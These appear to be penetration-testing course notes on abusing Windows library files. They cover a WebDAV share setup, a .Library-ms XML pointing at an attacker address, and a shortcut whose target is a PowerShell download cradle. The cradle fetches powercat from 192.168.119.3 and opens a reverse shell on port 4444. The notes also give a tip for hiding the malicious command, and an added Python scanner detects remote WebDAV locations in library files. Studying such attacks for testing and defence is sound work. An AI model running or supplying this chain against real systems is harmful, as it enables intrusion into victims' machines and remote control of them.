
Abusing Windows Library Files

11.3.1 - Obtaining Code Execution via Windows Library Files

This is a two-stage client-side attack example: a Windows library file pointing at a WebDAV share we control is used for initial access, and that foothold is then used to deliver an executable (here a shortcut running a PowerShell download cradle) that gives us a shell.

Start by setting up a WebDAV share on Kali

pip3 install wsgidav

Run wsgidav. With --host=0.0.0.0 it listens on every interface, so the share should be reachable on 127.0.0.1 as well as on the Kali address the target will use.

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/oscar

Example XML for our library file. It can be delivered to the target via an SMB server, an HTTP server, etc.

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
    <name>@windows.storage.dll,-34582</name>
    <version>6</version>
    <isLibraryPinned>true</isLibraryPinned>
    <iconReference>imageres.dll,-1003</iconReference>
    <templateInfo>
        <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
    </templateInfo>
    <searchConnectorDescriptionList>
        <searchConnectorDescription>
            <isDefaultSaveLocation>true</isDefaultSaveLocation>
            <isSupported>false</isSupported>
            <simpleLocation>
                <url>http://192.168.119.2</url>
            </simpleLocation>
        </searchConnectorDescription>
    </searchConnectorDescriptionList>
</libraryDescription>
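From the defensive side, the giveaway in a library file like the one above is a searchConnectorDescription whose simpleLocation url is a remote HTTP(S) (WebDAV) address rather than a local folder. The scanner below is an added example, not part of the original notes: it parses the library XML with its namespace and returns every remote location, so it can be run over .Library-ms files found on endpoints or in mail attachments. Both XML samples in it are constructed for the example.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Namespace used by Windows library description files (as in the example above).
NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}

# Constructed sample: a library whose only location is a remote WebDAV share.
SUSPICIOUS_LIBRARY = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>http://192.168.119.2</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

# Constructed sample: a benign library that only references a local folder.
BENIGN_LIBRARY = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Documents</name>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>C:\\Users\\user\\Documents</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""


def library_locations(xml_text: str) -> list[str]:
    """Return every <simpleLocation><url> value in a library description."""
    root = ET.fromstring(xml_text)
    urls = root.iterfind(".//lib:simpleLocation/lib:url", NS)
    return [u.text.strip() for u in urls if u.text]


def remote_locations(xml_text: str) -> list[str]:
    """Return the locations that point at a share over HTTP(S), i.e. WebDAV."""
    flagged = []
    for loc in library_locations(xml_text):
        # A local path such as C:\Users\... parses with a one-letter "scheme",
        # so only genuine http/https URLs are reported.
        if urlparse(loc).scheme.lower() in ("http", "https"):
            flagged.append(loc)
    return flagged


if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS_LIBRARY), ("benign", BENIGN_LIBRARY)):
        print(label, remote_locations(doc))
```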

Create a shortcut file on the Windows desktop with this command pasted in as the target. Note that putting a delimiter and a benign command after it can help hide the malicious part of the command.

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1'); powercat -c 192.168.119.3 -p 4444 -e powershell"